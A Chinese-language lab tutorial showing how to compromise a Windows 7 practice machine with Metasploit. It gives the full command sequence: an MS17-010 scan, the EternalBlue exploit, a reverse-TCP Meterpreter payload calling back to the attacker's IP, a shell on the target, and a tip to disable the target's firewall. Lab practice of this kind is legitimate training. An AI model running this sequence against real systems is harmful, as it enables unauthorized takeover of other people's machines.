Web渗透小案例——利用Metasploit(MSF)拿下Windows7

开启MSF

开启数据库:

service postgresql start

初始化msf数据库(第一次使用msf需要):

msfdb init

Web渗透小案例——利用Metasploit(MSF)拿下Windows7

开启MSF:

msfconsole

Web渗透小案例——利用Metasploit(MSF)拿下Windows7
查看数据连接状态:

db_status

Web渗透小案例——利用Metasploit(MSF)拿下Windows7

攻击开始

使用Auxiliary辅助模块嗅探目标

选择模块:

use auxiliary/scanner/smb/smb_ms_17_010

Web渗透小案例——利用Metasploit(MSF)拿下Windows7
设置目标主机并开始测试:

Web渗透小案例——利用Metasploit(MSF)拿下Windows7
绿色+表示有可能出现漏洞

选择和设置攻击模块

我们选择永恒之蓝模块进行攻击,并设置目标的ip

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.83.156(靶机ip)

Web渗透小案例——利用Metasploit(MSF)拿下Windows7
查看可用payload

show payloads

我们选择反向连接reverse
Web渗透小案例——利用Metasploit(MSF)拿下Windows7
设置反向连接payload和本机地址

set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.83.154(本机ip)

Web渗透小案例——利用Metasploit(MSF)拿下Windows7

运行攻击脚本

输入run进行攻击

run

Web渗透小案例——利用Metasploit(MSF)拿下Windows7
成功拿下主机。

拿下服务器后的工作

关闭靶机防火墙

检测到攻击,靶机会在一分钟后进行重启。关掉靶机的防火墙,靶机就不会再检测攻击。

拿到shell权限

输入shell拿到shell权限

shell

Web渗透小案例——利用Metasploit(MSF)拿下Windows7
如有乱码,请更改Kali机的终端编码格式。
拿到了shell权限,我们就可以进行更多操作